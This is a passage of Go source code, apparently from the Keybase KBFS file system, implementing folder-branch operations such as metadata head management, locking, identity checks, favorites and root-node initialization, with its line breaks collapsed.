updateDoneChan chan struct{} // forceSyncChan is read from by the background sync process // to know when it should sync immediately. forceSyncChan <-chan struct{} // How to resolve conflicts cr *ConflictResolver // Helper class for archiving and cleaning up the blocks for this TLF fbm *folderBlockManager // rekeyWithPromptTimer tracks a timed function that will try to // rekey with a paper key prompt, if enough time has passed. // Protected by mdWriterLock rekeyWithPromptTimer *time.Timer editHistory *TlfEditHistory mdFlushes RepeatedWaitGroup } var _ KBFSOps = (*folderBranchOps)(nil) var _ fbmHelper = (*folderBranchOps)(nil) // newFolderBranchOps constructs a new folderBranchOps object. func newFolderBranchOps(config Config, fb FolderBranch, bType branchType) *folderBranchOps { nodeCache := newNodeCacheStandard(fb) // make logger branchSuffix := "" if fb.Branch != MasterBranch { branchSuffix = " " + string(fb.Branch) } tlfStringFull := fb.Tlf.String() // Shorten the TLF ID for the module name. 8 characters should be // unique enough for a local node. log := config.MakeLogger(fmt.Sprintf("FBO %s%s", tlfStringFull[:8], branchSuffix)) // But print it out once in full, just in case. log.CInfof(nil, "Created new folder-branch for %s", tlfStringFull) observers := newObserverList() mdWriterLock := makeLeveledMutex(mutexLevel(fboMDWriter), &sync.Mutex{}) headLock := makeLeveledRWMutex(mutexLevel(fboHead), &sync.RWMutex{}) blockLockMu := makeLeveledRWMutex(mutexLevel(fboBlock), &sync.RWMutex{}) forceSyncChan := make(chan struct{}) fbo := &folderBranchOps{ config: config, folderBranch: fb, bid: BranchID{}, bType: bType, observers: observers, status: newFolderBranchStatusKeeper(config, nodeCache), mdWriterLock: mdWriterLock, headLock: headLock, blocks: folderBlockOps{ config: config, log: log, folderBranch: fb, observers: observers, forceSyncChan: forceSyncChan, blockLock: blockLock{ leveledRWMutex: blockLockMu, }, dirtyFiles: make(map[BlockPointer]*dirtyFile), unrefCache: make(map[blockRef]*syncInfo), deCache: make(map[blockRef]DirEntry), nodeCache: nodeCache, }, nodeCache: nodeCache, log: log, deferLog: log.CloneWithAddedDepth(1), shutdownChan: make(chan struct{}), updatePauseChan: make(chan (<-chan struct{})), forceSyncChan: forceSyncChan, } fbo.cr = NewConflictResolver(config, fbo) fbo.fbm = newFolderBlockManager(config, fb, fbo) fbo.editHistory = NewTlfEditHistory(config, fbo, log) if config.DoBackgroundFlushes() { go fbo.backgroundFlusher(secondsBetweenBackgroundFlushes * time.Second) } return fbo } // markForReIdentifyIfNeeded checks whether this tlf is identified and mark // it for lazy reidentification if it exceeds time limits. func (fbo *folderBranchOps) markForReIdentifyIfNeeded(now time.Time, maxValid time.Duration) { fbo.identifyLock.Lock() defer fbo.identifyLock.Unlock() if fbo.identifyDone && (now.Before(fbo.identifyTime) || fbo.identifyTime.Add(maxValid).Before(now)) { fbo.log.CDebugf(nil, "Expiring identify from %v", fbo.identifyTime) fbo.identifyDone = false } } // Shutdown safely shuts down any background goroutines that may have // been launched by folderBranchOps. func (fbo *folderBranchOps) Shutdown() error { if fbo.config.CheckStateOnShutdown() { ctx := context.TODO() lState := makeFBOLockState() if fbo.blocks.GetState(lState) == dirtyState { fbo.log.CDebugf(ctx, "Skipping state-checking due to dirty state") } else if !fbo.isMasterBranch(lState) { fbo.log.CDebugf(ctx, "Skipping state-checking due to being staged") } else { // Make sure we're up to date first if err := fbo.SyncFromServerForTesting(ctx, fbo.folderBranch); err != nil { return err } // Check the state for consistency before shutting down. sc := NewStateChecker(fbo.config) if err := sc.CheckMergedState(ctx, fbo.id()); err != nil { return err } } } close(fbo.shutdownChan) fbo.cr.Shutdown() fbo.fbm.shutdown() fbo.editHistory.Shutdown() // Wait for the update goroutine to finish, so that we don't have // any races with logging during test reporting. if fbo.updateDoneChan != nil { <-fbo.updateDoneChan } return nil } func (fbo *folderBranchOps) id() TlfID { return fbo.folderBranch.Tlf } func (fbo *folderBranchOps) branch() BranchName { return fbo.folderBranch.Branch } func (fbo *folderBranchOps) GetFavorites(ctx context.Context) ( []Favorite, error) { return nil, errors.New("GetFavorites is not supported by folderBranchOps") } func (fbo *folderBranchOps) RefreshCachedFavorites(ctx context.Context) { // no-op } func (fbo *folderBranchOps) DeleteFavorite(ctx context.Context, fav Favorite) error { return errors.New("DeleteFavorite is not supported by folderBranchOps") } func (fbo *folderBranchOps) AddFavorite(ctx context.Context, fav Favorite) error { return errors.New("AddFavorite is not supported by folderBranchOps") } func (fbo *folderBranchOps) addToFavorites(ctx context.Context, favorites *Favorites, created bool) (err error) { lState := makeFBOLockState() head := fbo.getHead(lState) if head == (ImmutableRootMetadata{}) { return OpsCantHandleFavorite{"Can't add a favorite without a handle"} } return fbo.addToFavoritesByHandle(ctx, favorites, head.GetTlfHandle(), created) } func (fbo *folderBranchOps) addToFavoritesByHandle(ctx context.Context, favorites *Favorites, handle *TlfHandle, created bool) (err error) { if _, _, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx); err != nil { // Can't favorite while not logged in return nil } favorites.AddAsync(ctx, handle.toFavToAdd(created)) return nil } func (fbo *folderBranchOps) deleteFromFavorites(ctx context.Context, favorites *Favorites) error { if _, _, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx); err != nil { // Can't unfavorite while not logged in return nil } lState := makeFBOLockState() head := fbo.getHead(lState) if head == (ImmutableRootMetadata{}) { // This can happen when identifies fail and the head is never set. return OpsCantHandleFavorite{"Can't delete a favorite without a handle"} } h := head.GetTlfHandle() return favorites.Delete(ctx, h.ToFavorite()) } func (fbo *folderBranchOps) getHead(lState *lockState) ImmutableRootMetadata { fbo.headLock.RLock(lState) defer fbo.headLock.RUnlock(lState) return fbo.head } // isMasterBranch should not be called if mdWriterLock is already taken. func (fbo *folderBranchOps) isMasterBranch(lState *lockState) bool { fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.bid == NullBranchID } func (fbo *folderBranchOps) isMasterBranchLocked(lState *lockState) bool { fbo.mdWriterLock.AssertLocked(lState) return fbo.bid == NullBranchID } func (fbo *folderBranchOps) setBranchIDLocked(lState *lockState, bid BranchID) { fbo.mdWriterLock.AssertLocked(lState) fbo.bid = bid if bid == NullBranchID { fbo.status.setCRSummary(nil, nil) } } func (fbo *folderBranchOps) checkDataVersion(p path, ptr BlockPointer) error { if ptr.DataVer < FirstValidDataVer { return InvalidDataVersionError{ptr.DataVer} } // TODO: migrate back to fbo.config.DataVersion if ptr.DataVer > FilesWithHolesDataVer { return NewDataVersionError{p, ptr.DataVer} } return nil } func (fbo *folderBranchOps) setHeadLocked( ctx context.Context, lState *lockState, md ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) isFirstHead := fbo.head == ImmutableRootMetadata{} wasReadable := false if !isFirstHead { wasReadable = fbo.head.IsReadable() if fbo.head.mdID == md.mdID { panic(fmt.Errorf("Re-putting the same MD: %s", md.mdID)) } } fbo.log.CDebugf(ctx, "Setting head revision to %d", md.Revision()) err := fbo.config.MDCache().Put(md) if err != nil { return err } // If this is the first time the MD is being set, and we are // operating on unmerged data, initialize the state properly and // kick off conflict resolution. if isFirstHead && md.MergedStatus() == Unmerged { fbo.setBranchIDLocked(lState, md.BID()) // Use uninitialized for the merged branch; the unmerged // revision is enough to trigger conflict resolution. fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized) } else if md.MergedStatus() == Merged { // If we are already merged through this write, the revision would be the // latestMergedRevision on server. fbo.setLatestMergedRevisionLocked(ctx, lState, md.Revision(), false) } // Make sure that any unembedded block changes have been swapped // back in. if md.data.Changes.Info.BlockPointer != zeroPtr && len(md.data.Changes.Ops) == 0 { return errors.New("Must swap in block changes before setting head") } fbo.head = md fbo.status.setRootMetadata(md) if isFirstHead { // Start registering for updates right away, using this MD // as a starting point. For now only the master branch can // get updates if fbo.branch() == MasterBranch { fbo.updateDoneChan = make(chan struct{}) go fbo.registerAndWaitForUpdates() } } if !wasReadable && md.IsReadable() { // Let any listeners know that this folder is now readable, // which may indicate that a rekey successfully took place. fbo.config.Reporter().Notify(ctx, mdReadSuccessNotification( md.GetTlfHandle(), md.TlfID().IsPublic())) } return nil } // setInitialHeadUntrustedLocked is for when the given RootMetadata // was fetched not due to a user action, i.e. via a Rekey // notification, and we don't have a TLF name to check against. func (fbo *folderBranchOps) setInitialHeadUntrustedLocked(ctx context.Context, lState *lockState, md ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) if fbo.head != (ImmutableRootMetadata{}) { return errors.New("Unexpected non-nil head in setInitialHeadUntrustedLocked") } return fbo.setHeadLocked(ctx, lState, md) } // setNewInitialHeadLocked is for when we're creating a brand-new TLF. func (fbo *folderBranchOps) setNewInitialHeadLocked(ctx context.Context, lState *lockState, md ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) if fbo.head != (ImmutableRootMetadata{}) { return errors.New("Unexpected non-nil head in setNewInitialHeadLocked") } if md.Revision() != MetadataRevisionInitial { return fmt.Errorf("setNewInitialHeadLocked unexpectedly called with revision %d", md.Revision()) } return fbo.setHeadLocked(ctx, lState, md) } // setInitialHeadUntrustedLocked is for when the given RootMetadata // was fetched due to a user action, and will be checked against the // TLF name. func (fbo *folderBranchOps) setInitialHeadTrustedLocked(ctx context.Context, lState *lockState, md ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) if fbo.head != (ImmutableRootMetadata{}) { return errors.New("Unexpected non-nil head in setInitialHeadUntrustedLocked") } return fbo.setHeadLocked(ctx, lState, md) } // setHeadSuccessorLocked is for when we're applying updates from the // server or when we're applying new updates we created ourselves. func (fbo *folderBranchOps) setHeadSuccessorLocked(ctx context.Context, lState *lockState, md ImmutableRootMetadata, rebased bool) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) if fbo.head == (ImmutableRootMetadata{}) { // This can happen in tests via SyncFromServerForTesting(). return fbo.setInitialHeadTrustedLocked(ctx, lState, md) } if !rebased { err := fbo.head.CheckValidSuccessor(fbo.head.mdID, md.ReadOnly()) if err != nil { return err } } oldHandle := fbo.head.GetTlfHandle() newHandle := md.GetTlfHandle() // Newer handles should be equal or more resolved over time. // // TODO: In some cases, they shouldn't, e.g. if we're on an // unmerged branch. Add checks for this. resolvesTo, partialResolvedOldHandle, err := oldHandle.ResolvesTo( ctx, fbo.config.Codec(), fbo.config.KBPKI(), *newHandle) if err != nil { return err } oldName := oldHandle.GetCanonicalName() newName := newHandle.GetCanonicalName() if !resolvesTo { return IncompatibleHandleError{ oldName, partialResolvedOldHandle.GetCanonicalName(), newName, } } err = fbo.setHeadLocked(ctx, lState, md) if err != nil { return err } if oldName != newName { fbo.log.CDebugf(ctx, "Handle changed (%s -> %s)", oldName, newName) // If the handle has changed, send out a notification. fbo.observers.tlfHandleChange(ctx, fbo.head.GetTlfHandle()) // Also the folder should be re-identified given the // newly-resolved assertions. func() { fbo.identifyLock.Lock() defer fbo.identifyLock.Unlock() fbo.identifyDone = false }() } return nil } // setHeadPredecessorLocked is for when we're unstaging updates. func (fbo *folderBranchOps) setHeadPredecessorLocked(ctx context.Context, lState *lockState, md ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) if fbo.head == (ImmutableRootMetadata{}) { return errors.New("Unexpected nil head in setHeadPredecessorLocked") } if fbo.head.Revision() <= MetadataRevisionInitial { return fmt.Errorf("setHeadPredecessorLocked unexpectedly called with revision %d", fbo.head.Revision()) } if fbo.head.MergedStatus() != Unmerged { return errors.New("Unexpected merged head in setHeadPredecessorLocked") } err := md.CheckValidSuccessor(md.mdID, fbo.head.ReadOnly()) if err != nil { return err } oldHandle := fbo.head.GetTlfHandle() newHandle := md.GetTlfHandle() // The two handles must be the same, since no rekeying is done // while unmerged. eq, err := oldHandle.Equals(fbo.config.Codec(), *newHandle) if err != nil { return err } if !eq { return fmt.Errorf( "head handle %v unexpectedly not equal to new handle = %v", oldHandle, newHandle) } return fbo.setHeadLocked(ctx, lState, md) } // setHeadConflictResolvedLocked is for when we're setting the merged // update with resolved conflicts. func (fbo *folderBranchOps) setHeadConflictResolvedLocked(ctx context.Context, lState *lockState, md ImmutableRootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) fbo.headLock.AssertLocked(lState) if fbo.head.MergedStatus() != Unmerged { return errors.New("Unexpected merged head in setHeadConflictResolvedLocked") } if md.MergedStatus() != Merged { return errors.New("Unexpected unmerged update in setHeadConflictResolvedLocked") } return fbo.setHeadLocked(ctx, lState, md) } func (fbo *folderBranchOps) identifyOnce( ctx context.Context, md ReadOnlyRootMetadata) error { fbo.identifyLock.Lock() defer fbo.identifyLock.Unlock() if fbo.identifyDone { return nil } h := md.GetTlfHandle() fbo.log.CDebugf(ctx, "Running identifies on %s", h.GetCanonicalPath()) kbpki := fbo.config.KBPKI() err := identifyHandle(ctx, kbpki, kbpki, h) if err != nil { fbo.log.CDebugf(ctx, "Identify finished with error: %v", err) // For now, if the identify fails, let the // next function to hit this code path retry. return err } fbo.log.CDebugf(ctx, "Identify finished successfully") fbo.identifyDone = true fbo.identifyTime = fbo.config.Clock().Now() return nil } // if rtype == mdWrite || mdRekey, then mdWriterLock must be taken func (fbo *folderBranchOps) getMDLocked( ctx context.Context, lState *lockState, rtype mdReqType) ( md ImmutableRootMetadata, err error) { defer func() { if err != nil || rtype == mdReadNoIdentify || rtype == mdRekey { return } err = fbo.identifyOnce(ctx, md.ReadOnly()) }() md = fbo.getHead(lState) if md != (ImmutableRootMetadata{}) { return md, nil } // Unless we're in mdWrite or mdRekey mode, we can't safely fetch // the new MD without causing races, so bail. if rtype != mdWrite && rtype != mdRekey { return ImmutableRootMetadata{}, MDWriteNeededInRequest{} } // We go down this code path either due to a rekey // notification for an unseen TLF, or in some tests. // // TODO: Make tests not take this code path, and keep track of // the fact that MDs coming from rekey notifications are // untrusted. fbo.mdWriterLock.AssertLocked(lState) // Not in cache, fetch from server and add to cache. First, see // if this device has any unmerged commits -- take the latest one. mdops := fbo.config.MDOps() // get the head of the unmerged branch for this device (if any) md, err = mdops.GetUnmergedForTLF(ctx, fbo.id(), NullBranchID) if err != nil { return ImmutableRootMetadata{}, err } mergedMD, err := mdops.GetForTLF(ctx, fbo.id()) if err != nil { return ImmutableRootMetadata{}, err } if mergedMD == (ImmutableRootMetadata{}) { return ImmutableRootMetadata{}, fmt.Errorf("Got nil RMD for %s", fbo.id()) } if md == (ImmutableRootMetadata{}) { // There are no unmerged MDs for this device, so just use the current head. md = mergedMD } else { func() { fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) // We don't need to do this for merged head // because the setHeadLocked() already does // that anyway. fbo.setLatestMergedRevisionLocked(ctx, lState, mergedMD.Revision(), false) }() } if md.data.Dir.Type != Dir && (!md.IsInitialized() || md.IsReadable()) { return ImmutableRootMetadata{}, fmt.Errorf("Got undecryptable RMD for %s: initialized=%t, readable=%t", fbo.id(), md.IsInitialized(), md.IsReadable()) } fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) err = fbo.setInitialHeadUntrustedLocked(ctx, lState, md) if err != nil { return ImmutableRootMetadata{}, err } return md, nil } func (fbo *folderBranchOps) getMDForReadHelper( ctx context.Context, lState *lockState, rtype mdReqType) (ImmutableRootMetadata, error) { md, err := fbo.getMDLocked(ctx, lState, rtype) if err != nil { return ImmutableRootMetadata{}, err } if !md.TlfID().IsPublic() { username, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return ImmutableRootMetadata{}, err } if !md.GetTlfHandle().IsReader(uid) { return ImmutableRootMetadata{}, NewReadAccessError(md.GetTlfHandle(), username) } } return md, nil } // getMostRecentFullyMergedMD is a helper method that returns the most // recent merged MD that has been flushed to the server. This could // be different from the current local head if journaling is on. If // the journal is on a branch, it returns an error. func (fbo *folderBranchOps) getMostRecentFullyMergedMD(ctx context.Context) ( ImmutableRootMetadata, error) { lState := makeFBOLockState() jServer, err := GetJournalServer(fbo.config) if err != nil { // Journaling is disabled entirely, so use the local head. return fbo.getMDForReadHelper(ctx, lState, mdReadNoIdentify) } jStatus, err := jServer.JournalStatus(fbo.id()) if err != nil { // Journaling is disabled for this TLF, so use the local head. // TODO: JournalStatus could return other errors (likely // file/disk corruption) that indicate a real problem, so it // might be nice to type those errors so we can distinguish // them. return fbo.getMDForReadHelper(ctx, lState, mdReadNoIdentify) } if jStatus.BranchID != NullBranchID.String() { return ImmutableRootMetadata{}, errors.New("Cannot find most recent merged revision while staged") } if jStatus.RevisionStart == MetadataRevisionUninitialized { // The journal is empty, so the local head must be the most recent. return fbo.getMDForReadHelper(ctx, lState, mdReadNoIdentify) } else if jStatus.RevisionStart == MetadataRevisionInitial { // Nothing has been flushed to the servers yet, so don't // return anything. return ImmutableRootMetadata{}, errors.New("No flushed MDs yet") } // Otherwise, use the revision from before the start of the journal. mergedRev := jStatus.RevisionStart - 1 rmd, err := getSingleMD(ctx, fbo.config, fbo.id(), NullBranchID, mergedRev, Merged) if err != nil { return ImmutableRootMetadata{}, err } fbo.log.CDebugf(ctx, "Most recent fully merged revision is %d", mergedRev) return rmd, nil } func (fbo *folderBranchOps) getMDForReadNoIdentify( ctx context.Context, lState *lockState) (ImmutableRootMetadata, error) { return fbo.getMDForReadHelper(ctx, lState, mdReadNoIdentify) } func (fbo *folderBranchOps) getMDForReadNeedIdentify( ctx context.Context, lState *lockState) (ImmutableRootMetadata, error) { return fbo.getMDForReadHelper(ctx, lState, mdReadNeedIdentify) } // getMDForWriteLocked returns a new RootMetadata object with an // incremented version number for modification. If the returned object // is put to the MDServer (via MDOps), mdWriterLock must be held until // then. (See comments for mdWriterLock above.) func (fbo *folderBranchOps) getMDForWriteLocked( ctx context.Context, lState *lockState) (*RootMetadata, error) { return fbo.getMDForWriteLockedForFilename(ctx, lState, "") } func (fbo *folderBranchOps) getMDForWriteLockedForFilename( ctx context.Context, lState *lockState, filename string) (*RootMetadata, error) { fbo.mdWriterLock.AssertLocked(lState) md, err := fbo.getMDLocked(ctx, lState, mdWrite) if err != nil { return nil, err } username, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return nil, err } if !md.GetTlfHandle().IsWriter(uid) { return nil, NewWriteAccessError(md.GetTlfHandle(), username, filename) } // Make a new successor of the current MD to hold the coming // writes. The caller must pass this into // syncBlockAndCheckEmbedLocked or the changes will be lost. newMd, err := md.MakeSuccessor(fbo.config, md.mdID, true) if err != nil { return nil, err } return newMd, nil } func (fbo *folderBranchOps) getMDForRekeyWriteLocked( ctx context.Context, lState *lockState) (rmd *RootMetadata, wasRekeySet bool, err error) { fbo.mdWriterLock.AssertLocked(lState) md, err := fbo.getMDLocked(ctx, lState, mdRekey) if err != nil { return nil, false, err } username, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return nil, false, err } handle := md.GetTlfHandle() // must be a reader or writer (it checks both.) if !handle.IsReader(uid) { return nil, false, NewRekeyPermissionError(md.GetTlfHandle(), username) } newMd, err := md.MakeSuccessor(fbo.config, md.mdID, handle.IsWriter(uid)) if err != nil { return nil, false, err } // readers shouldn't modify writer metadata if !handle.IsWriter(uid) && !newMd.IsWriterMetadataCopiedSet() { return nil, false, NewRekeyPermissionError(handle, username) } return newMd, md.IsRekeySet(), nil } func (fbo *folderBranchOps) nowUnixNano() int64 { return fbo.config.Clock().Now().UnixNano() } func (fbo *folderBranchOps) maybeUnembedAndPutOneBlock(ctx context.Context, md *RootMetadata) error { if fbo.config.BlockSplitter().ShouldEmbedBlockChanges(&md.data.Changes) { return nil } _, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return err } bps := newBlockPutState(1) err = fbo.unembedBlockChanges(ctx, bps, md, &md.data.Changes, uid) if err != nil { return err } defer func() { if err != nil { fbo.fbm.cleanUpBlockState(md.ReadOnly(), bps, blockDeleteOnMDFail) } }() ptrsToDelete, err := doBlockPuts(ctx, fbo.config.BlockServer(), fbo.config.BlockCache(), fbo.config.Reporter(), fbo.log, md.TlfID(), md.GetTlfHandle().GetCanonicalName(), *bps) if err != nil { return err } if len(ptrsToDelete) > 0 { return fmt.Errorf("Unexpected pointers to delete after "+ "unembedding block changes in gc op: %v", ptrsToDelete) } return nil } func (fbo *folderBranchOps) initMDLocked( ctx context.Context, lState *lockState, md *RootMetadata) error { fbo.mdWriterLock.AssertLocked(lState) // create a dblock since one doesn't exist yet username, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return err } handle := md.GetTlfHandle() // make sure we're a writer before rekeying or putting any blocks. if !handle.IsWriter(uid) { return NewWriteAccessError(handle, username, handle.GetCanonicalPath()) } newDblock := &DirBlock{ Children: make(map[string]DirEntry), } var expectedKeyGen KeyGen var tlfCryptKey *TLFCryptKey if md.TlfID().IsPublic() { expectedKeyGen = PublicKeyGen } else { var rekeyDone bool // create a new set of keys for this metadata rekeyDone, tlfCryptKey, err = fbo.config.KeyManager().Rekey(ctx, md, false) if err != nil { return err } if !rekeyDone { return fmt.Errorf("Initial rekey unexpectedly not done for private TLF %v", md.TlfID()) } expectedKeyGen = FirstValidKeyGen } keyGen := md.LatestKeyGeneration() if keyGen != expectedKeyGen { return InvalidKeyGenerationError{md.TlfID(), keyGen} } info, plainSize, readyBlockData, err := fbo.blocks.ReadyBlock(ctx, md.ReadOnly(), newDblock, uid) if err != nil { return err } now := fbo.nowUnixNano() md.data.Dir = DirEntry{ BlockInfo: info, EntryInfo: EntryInfo{ Type: Dir, Size: uint64(plainSize), Mtime: now, Ctime: now, }, } co := newCreateOpForRootDir() md.AddOp(co) md.AddRefBlock(md.data.Dir.BlockInfo) md.SetUnrefBytes(0) if err = putBlockCheckQuota(ctx, fbo.config.BlockServer(), fbo.config.Reporter(), md.TlfID(), info.BlockPointer, readyBlockData, md.GetTlfHandle().GetCanonicalName()); err != nil { return err } if err = fbo.config.BlockCache().Put( info.BlockPointer, fbo.id(), newDblock, TransientEntry); err != nil { return err } if err := fbo.maybeUnembedAndPutOneBlock(ctx, md); err != nil { return err } // finally, write out the new metadata mdID, err := fbo.config.MDOps().Put(ctx, md) if err != nil { return err } fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) if fbo.head != (ImmutableRootMetadata{}) { return fmt.Errorf( "%v: Unexpected MD ID during new MD initialization: %v", md.TlfID(), fbo.head.mdID) } fbo.setNewInitialHeadLocked(ctx, lState, MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now())) if err != nil { return err } // cache any new TLF crypt key if tlfCryptKey != nil { err = fbo.config.KeyCache().PutTLFCryptKey(md.TlfID(), keyGen, *tlfCryptKey) if err != nil { return err } } return nil } func (fbo *folderBranchOps) GetTLFCryptKeys(ctx context.Context, h *TlfHandle) (keys []TLFCryptKey, id TlfID, err error) { return nil, TlfID{}, errors.New("GetTLFCryptKeys is not supported by folderBranchOps") } func (fbo *folderBranchOps) GetOrCreateRootNode( ctx context.Context, h *TlfHandle, branch BranchName) ( node Node, ei EntryInfo, err error) { return nil, EntryInfo{}, errors.New("GetOrCreateRootNode is not supported by folderBranchOps") } func (fbo *folderBranchOps) GetRootNode( ctx context.Context, h *TlfHandle, branch BranchName) ( node Node, ei EntryInfo, err error) { return nil, EntryInfo{}, errors.New("GetRootNode is not supported by folderBranchOps") } func (fbo *folderBranchOps) checkNode(node Node) error { fb := node.GetFolderBranch() if fb != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, fb} } return nil } // SetInitialHeadFromServer sets the head to the given // ImmutableRootMetadata, which must be retrieved from the MD server. func (fbo *folderBranchOps) SetInitialHeadFromServer( ctx context.Context, md ImmutableRootMetadata) (err error) { fbo.log.CDebugf(ctx, "SetInitialHeadFromServer, revision=%d (%s)", md.Revision(), md.MergedStatus()) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() if md.data.Dir.Type != Dir { // Not initialized. return fmt.Errorf("MD with revision=%d not initialized", md.Revision()) } return runUnlessCanceled(ctx, func() error { fb := FolderBranch{md.TlfID(), MasterBranch} if fb != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, fb} } // Always identify first when trying to initialize the folder, // even if we turn out not to be a writer. (We can't rely on // the identifyOnce call in getMDLocked, because that isn't // called from the initialization code path when the local // user is not a valid writer.) Also, we want to make sure we // fail before we set the head, otherwise future calls will // succeed incorrectly. err = fbo.identifyOnce(ctx, md.ReadOnly()) if err != nil { return err } lState := makeFBOLockState() fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) if md.MergedStatus() == Unmerged { mdops := fbo.config.MDOps() mergedMD, err := mdops.GetForTLF(ctx, fbo.id()) if err != nil { return err } func() { fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) fbo.setLatestMergedRevisionLocked(ctx, lState, mergedMD.Revision(), false) }() } fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) // Only update the head the first time; later it will be // updated either directly via writes or through the // background update processor. if fbo.head == (ImmutableRootMetadata{}) { err = fbo.setInitialHeadTrustedLocked(ctx, lState, md) if err != nil { return err } } return nil }) } // SetInitialHeadToNew creates a brand-new ImmutableRootMetadata // object and sets the head to that. func (fbo *folderBranchOps) SetInitialHeadToNew( ctx context.Context, id TlfID, handle *TlfHandle) (err error) { fbo.log.CDebugf(ctx, "SetInitialHeadToNew") defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() bh, err := handle.ToBareHandle() if err != nil { return err } rmd := NewRootMetadata() rmd.Update(id, bh) if err != nil { return err } // Need to keep the TLF handle around long enough to // rekey the metadata for the first time. rmd.tlfHandle = handle return runUnlessCanceled(ctx, func() error { fb := FolderBranch{rmd.TlfID(), MasterBranch} if fb != fbo.folderBranch { return WrongOpsError{fbo.folderBranch, fb} } // Always identify first when trying to initialize the folder, // even if we turn out not to be a writer. (We can't rely on // the identifyOnce call in getMDLocked, because that isn't // called from the initialization code path when the local // user is not a valid writer.) Also, we want to make sure we // fail before we set the head, otherwise future calls will // succeed incorrectly. err = fbo.identifyOnce(ctx, rmd.ReadOnly()) if err != nil { return err } lState := makeFBOLockState() fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) return fbo.initMDLocked(ctx, lState, rmd) }) } // execMDReadNoIdentifyThenMDWrite first tries to execute the // passed-in method in mdReadNoIdentify mode. If it fails with an // MDWriteNeededInRequest error, it re-executes the method as in // mdWrite mode. The passed-in method must note whether or not this // is an mdWrite call. // // This must only be used by getRootNode(). func (fbo *folderBranchOps) execMDReadNoIdentifyThenMDWrite( lState *lockState, f func(*lockState, mdReqType) error) error { err := f(lState, mdReadNoIdentify) // Redo as an MD write request if needed if _, ok := err.(MDWriteNeededInRequest); ok { fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) err = f(lState, mdWrite) } return err } func (fbo *folderBranchOps) getRootNode(ctx context.Context) ( node Node, ei EntryInfo, handle *TlfHandle, err error) { fbo.log.CDebugf(ctx, "getRootNode") defer func() { if err != nil { fbo.deferLog.CDebugf(ctx, "Error: %v", err) } else { // node may still be nil if we're unwinding // from a panic. fbo.deferLog.CDebugf(ctx, "Done: %v", node) } }() lState := makeFBOLockState() var md ImmutableRootMetadata err = fbo.execMDReadNoIdentifyThenMDWrite(lState, func(lState *lockState, rtype mdReqType) error { md, err = fbo.getMDLocked(ctx, lState, rtype) return err }) if err != nil { return nil, EntryInfo{}, nil, err } // we may be an unkeyed client if err := isReadableOrError(ctx, fbo.config, md.ReadOnly()); err != nil { return nil, EntryInfo{}, nil, err } handle = md.GetTlfHandle() node, err = fbo.nodeCache.GetOrCreate(md.data.Dir.BlockPointer, string(handle.GetCanonicalName()), nil) if err != nil { return nil, EntryInfo{}, nil, err } return node, md.Data().Dir.EntryInfo, handle, nil } type makeNewBlock func() Block // pathFromNodeHelper() shouldn't be called except by the helper // functions below. func (fbo *folderBranchOps) pathFromNodeHelper(n Node) (path, error) { p := fbo.nodeCache.PathFromNode(n) if !p.isValid() { return path{}, InvalidPathError{p} } return p, nil } // Helper functions to clarify uses of pathFromNodeHelper() (see // nodeCache comments). func (fbo *folderBranchOps) pathFromNodeForRead(n Node) (path, error) { return fbo.pathFromNodeHelper(n) } func (fbo *folderBranchOps) pathFromNodeForMDWriteLocked( lState *lockState, n Node) (path, error) { fbo.mdWriterLock.AssertLocked(lState) return fbo.pathFromNodeHelper(n) } func (fbo *folderBranchOps) GetDirChildren(ctx context.Context, dir Node) ( children map[string]EntryInfo, err error) { fbo.log.CDebugf(ctx, "GetDirChildren %p", dir.GetID()) defer func() { fbo.deferLog.CDebugf(ctx, "Done GetDirChildren: %v", err) }() err = fbo.checkNode(dir) if err != nil { return nil, err } err = runUnlessCanceled(ctx, func() error { var err error lState := makeFBOLockState() md, err := fbo.getMDForReadNeedIdentify(ctx, lState) if err != nil { return err } dirPath, err := fbo.pathFromNodeForRead(dir) if err != nil { return err } children, err = fbo.blocks.GetDirtyDirChildren( ctx, lState, md.ReadOnly(), dirPath) if err != nil { return err } return nil }) if err != nil { return nil, err } return children, nil } func (fbo *folderBranchOps) Lookup(ctx context.Context, dir Node, name string) ( node Node, ei EntryInfo, err error) { fbo.log.CDebugf(ctx, "Lookup %p %s", dir.GetID(), name) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(dir) if err != nil { return nil, EntryInfo{}, err } var de DirEntry err = runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() md, err := fbo.getMDForReadNeedIdentify(ctx, lState) if err != nil { return err } dirPath, err := fbo.pathFromNodeForRead(dir) if err != nil { return err } childPath := dirPath.ChildPathNoPtr(name) de, err = fbo.blocks.GetDirtyEntry( ctx, 